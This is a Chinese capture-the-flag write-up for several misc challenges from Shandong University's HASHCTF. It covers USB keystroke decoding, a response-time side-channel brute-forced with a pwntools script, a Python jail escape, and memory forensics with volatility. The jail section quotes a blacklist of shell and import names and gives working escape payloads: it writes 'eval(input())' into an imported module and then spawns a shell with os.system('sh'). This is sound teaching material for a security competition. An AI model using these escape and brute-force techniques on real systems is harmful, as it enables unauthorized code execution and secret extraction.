第一届山东大学HASHCTF部分Misc题解

下面是我在本次比赛出的题目的WriteUp

Secret of Keyboard

签到脚本题,有些同学的脚本解出来大小写不正确可能是由于脚本无法识别shift+字母的组合键

首先使用tshark:

tshark -r usb.pcap -T fields -e usb.capdata | sed '/^\s*$/d' > usbdata.txt

提取数据并删除空格

然后脚本一把梭出来:

keyboard.py:

normalKeys = {
"04":"a", "05":"b", "06":"c", "07":"d", "08":"e",
"09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j",
"0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o",
"13":"p", "14":"q", "15":"r", "16":"s", "17":"t",
"18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y",
"1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4",
"22":"5", "23":"6","24":"7","25":"8","26":"9",
"27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t",
"2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\",
"32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".",
"38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>",
"3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>",
"44":"<F11>","45":"<F12>"}
shiftKeys = {
"04":"A", "05":"B", "06":"C", "07":"D", "08":"E",
"09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J",
"0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O",
"13":"P", "14":"Q", "15":"R", "16":"S", "17":"T",
"18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y",
"1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$",
"22":"%", "23":"^","24":"&","25":"*","26":"(","27":")",
"28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>",
"2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"",
"34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>",
"3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>",
"41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
f=open('usbdata.txt','r')
fi=open('out.txt','w')
while 1:
a=f.readline().strip()
if a:
if len(a)==16: # 鼠标流量的话len改为8
out=''
for i in range(0,len(a),2):
if i+2 != len(a):
out+=a[i]+a[i+1]+":"
else:
out+=a[i]+a[i+1]
fi.write(out)
fi.write('\n')
else:
break fi.close()
output = []
keys = open('out.txt')
for line in keys:
try:
if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
continue
if line[6:8] in normalKeys.keys():
output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
else:
output += ['[unknown]']
except:
pass keys.close() flag=0
print("".join(output))
for i in range(len(output)):
try:
a=output.index('<DEL>')
del output[a]
del output[a-1]
except:
pass for i in range(len(output)):
try:
if output[i]=="<CAP>":
flag+=1
output.pop(i)
if flag==2:
flag=0
if flag!=0:
output[i]=output[i].upper()
except:
pass print ('output :' + "".join(output))

Response Time

其实也算是个签到题,不过没多少人做/(ㄒoㄒ)/~~

使用nc(netcat)连接之后,尝试输入flag头,猜测出每次输入时,如果当前位输入正确,输出响应的时间就会较长,然后会进入下一位的输入检测判断。

为了方便大家理解,我在此贴出服务端代码:

import time
import os
banner ='''
/$$ /$$
| $$ |__/
/$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$$$$$/$$$$ /$$$$$$
/$$__ $$ /$$__ $$ /$$_____/ /$$__ $$ /$$__ $$| $$__ $$ /$$_____/ /$$__ $$ |_ $$_/ | $$| $$_ $$_ $$ /$$__ $$
| $$ \__/| $$$$$$$$| $$$$$$ | $$ \ $$| $$ \ $$| $$ \ $$| $$$$$$ | $$$$$$$$ | $$ | $$| $$ \ $$ \ $$| $$$$$$$$
| $$ | $$_____/ \____ $$| $$ | $$| $$ | $$| $$ | $$ \____ $$| $$_____/ | $$ /$$| $$| $$ | $$ | $$| $$_____/
| $$ | $$$$$$$ /$$$$$$$/| $$$$$$$/| $$$$$$/| $$ | $$ /$$$$$$$/| $$$$$$$ | $$$$/| $$| $$ | $$ | $$| $$$$$$$
|__/ \_______/|_______/ | $$____/ \______/ |__/ |__/|_______/ \_______//$$$$$$\___/ |__/|__/ |__/ |__/ \_______/
| $$ |______/
| $$
|__/ '''
print(banner)
flag=''
with open('/flag', 'r') as file:
flag = file.read()
flag=flag.strip() sum=0
print("Can you find the secret of the response time?")
print()
print()
while(True):
if sum==len(flag) :
print('Congratulations! you get it!')
exit(0)
print('Please input one character:')
ans=input('> ')
if ans != flag[sum] and len(ans)==1:
print('Who knows whether it is the right character?')
print()
if ans == flag[sum] and len(ans)==1:
time.sleep(1.5)
print('Who knows whether it is the right character?')
print()
sum=sum+1
if len(ans)!=1:
print('Invalid input!')
print()

然后根据这个响应时间的特性,我们使用pwntools写出解题脚本

exp:

from pwn import *
import time from tqdm import tqdm
io = remote("127.0.0.1",45559)
table = '-{}abcdefghigklmnopqrstuvwxyz1234567890!_ABCDEFGHIJKLMNOPQRSTUVWXYZ'#定义的字符表
flag=''
for j in table:
for i in table:
io.sendline(bytes(i.encode()))
start_time = time.time()
io.recvuntil('Who knows whether it is the right character?\n',timeout=100000)
end_time=time.time()
response_time = end_time-start_time
if(response_time>1): #如果响应时间大于1s,就添加进flag
flag=flag+i
print(flag)
break #退出当次循环



爆一会就出来了

Pyjail

本题改编自2023强网杯Pyjail ! It’s myFILTER !!!

源码如下:

import code, os, subprocess,re
import pty
def blacklist_fun_callback(*args):
print("You are Hacker!!!") pty.spawn = blacklist_fun_callback
os.system = blacklist_fun_callback
os.popen = blacklist_fun_callback
subprocess.Popen = blacklist_fun_callback
subprocess.call = blacklist_fun_callback
code.interact = blacklist_fun_callback
code.compile_command = blacklist_fun_callback vars = blacklist_fun_callback
attr = blacklist_fun_callback
dir = blacklist_fun_callback
getattr = blacklist_fun_callback
exec = blacklist_fun_callback
__import__ = blacklist_fun_callback
compile = blacklist_fun_callback
breakpoint = blacklist_fun_callback
banner=
print(banner)
del os, subprocess, code, pty, blacklist_fun_callback
input_code = input("Can you input your code to escape > ")
print(input_code) blacklist_words = [
"subprocess",
"os",
"code",
"interact",
"pty",
"pdb",
"platform",
"importlib",
"timeit",
"imp",
"commands",
"popen",
"load_module",
"spawn",
"system",
"/bin/sh",
"/bin/bash",
"flag",
"eval",
"exec",
"compile",
"input",
"vars",
"attr",
"dir",
"getattr"
"__import__",
"__builtins__",
"__getattribute__",
"__class__",
"__base__",
"__subclasses__",
"__getitem__",
"__self__",
"__globals__",
"__init__",
"__name__",
"__dict__",
"._module",
"builtins",
"breakpoint",
"import",
] def check(input_code):
for x in blacklist_words:
if x in input_code:
print("False")
return False
return True while '{' in input_code and '}' in input_code and input_code.isascii() and check(input_code) and "eval" not in input_code and len(input_code) < 50 and "read" not in input_code :
input_code = eval(f"f'{input_code}'")
print(input_code)
else:
print("Player! Please obey the rules!")

设置了黑名单,禁用了大部分的模块和模块自带的函数,同时还禁用了字符串"eval"和"read"(注意是字符串),而且还规定了payload的长度不能超过50

在本题中,我import了一个无用的模块"re",并给出了提示:可以往某些模块里写一些东西

我们知道,当这个python程序执行时,首先会执行import的模块,所以,我们可以往re里写入{open("re.py","a").write("eva""l(inpu""t())")}

用"分隔来规避字符串检测,写入之后再重新访问,程序在执行re.py时,就会触发eval(input()),可以让我们输入任意代码并用eval()函数执行

此时我们使用一句话RCE __import__('os').system('sh'),即可getshell

我们二次元怎么你们了.png

被非预期了/(ㄒoㄒ)/~~(懒惰的出题人原题照搬的结果)

首先是malkuu选手提供的非预期打法:(社工的神)

然后是预期解:

题目名称提示png,使用volatility -f [镜像路径] --profile=Win7SP1x64 filescan | grep png

最后一行有个可疑文件Chuyin.png

我们使用volatility -f [镜像路径] --profile=Win7SP1x64 dumpfiles -Q [文件地址] -D [保存路径]把图片dump下来

然后使用图片隐写神器zsteg,一把梭

再把flag头换成HASHCTF就行了。

随机推荐

  1. JavaScript Library – Svelte

    前言 上一回我介绍了 Alpine.js.作为我开发企业网站 draft 版本的 render engine. 用了一阵子后,我觉得它真的非常不好用.所以打算换一个. 前端有好几个 framework ...

  2. SQL Server – Soft Delete

    前言 Soft Delete 中文叫 "逻辑删", "软删除". 对比的自然就是 Hard Delete. 这篇想聊一聊它的好与坏, 什么时候可以考虑用它. H ...

  3. Figma 学习笔记 – Component

    参考 Guide to Components in Figma Figma Tutorial: Components - The Basics (Youtube) 定义与用途 Figma 的 Comp ...

  4. 数字产品护照 (DPP) 解决方案:利用 Blazor 和区块链实现产品全生命周期追踪

    数字产品护照 (DPP) 解决方案:利用 Blazor 和区块链实现产品全生命周期追踪 随着全球对可持续发展和产品透明度的关注日益增加,企业需要一种可靠的方法来跟踪和管理产品生命周期中的关键数据.我们 ...

  5. 构建数据大屏,塑造IT运维可视化核心竞争力

    随着大数据.云计算等新兴技术的发展与运用,在金融.交通.教育.政府等行业的信息化在飞速发展.与此同时,各行业的IT建设与维护管理成本也在与日俱增,大量的运维工作下产生庞大的运维数据,如何进行运维数据可 ...

  6. C#通过JS变量提取天天基金API返回的基金净值

    目录 天天基金API 添加项目依赖项 请求 API 数据 获取所有基金代码 获取基金净值信息 功能测试 参考链接 天天基金API 常见的 API 如下: 所有基金代码:http://fund.east ...

  7. C++容器概览

    容器 容器是用来存储数据的序列,它们提供了不同的存储方式和访问模式. STL 中的容器可以分为三类: 1.序列容器:存储元素的序列,允许双向遍历. vector:动态数组,支持快速随机访问. dequ ...

  8. List、Set、Queue、Map

  9. 第一个selenium测试

    一.环境搭建 使用语言:python 1.python解释器:python.exe 版本 3.11.4 下载地址:[https://www.python.org/downloads/release/p ...

  10. 2024Java编程思想第四版(完整中文高清pdf)

    前言 再也不用担心书荒咯~~ 目录 Java编程思想第四版完整中文高清版(免费)***